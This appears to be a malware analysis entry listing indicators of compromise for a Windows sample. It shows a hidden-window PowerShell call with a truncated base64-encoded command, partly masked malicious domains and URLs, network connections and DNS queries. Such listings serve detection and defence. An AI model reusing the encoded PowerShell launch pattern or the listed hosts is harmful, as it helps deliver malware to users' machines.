Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQQB2AGMAYwBpAGYAbQBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEEAcwBhAGYAZgB0AHgAawB1AG0AIAAjAD4AIAAkAEYAZQBmAHMAYwB3AHIAaQB6AHYAZgA9ACcAUAB0AGEAZwBoA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1592
- %TEMP%\852295.cvr
- 'en###mgdk.com':80
- 'en###mgdk.com':443
- 'si#######sine.000webhostapp.com':443
- 'ej########antonio.000webhostapp.com':443
- 'ed#.#izino.com':443
- http://www.en###mgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/
- 'en###mgdk.com':443
- 'si#######sine.000webhostapp.com':443
- 'ej########antonio.000webhostapp.com':443
- 'ed#.#izino.com':443
- DNS ASK en###mgdk.com
- DNS ASK ne#.###mmunityre.com
- DNS ASK si#######sine.000webhostapp.com
- DNS ASK ej########antonio.000webhostapp.com
- DNS ASK ed#.#izino.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQQB2AGMAYwBpAGYAbQBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEEAcwBhAGYAZgB0AHgAawB1AG0AIAAjAD4AIAAkAEYAZQBmAHMAYwB3AHIAaQB6AHYAZgA9ACcAUAB0AGEAZwBoA...' (со скрытым окном)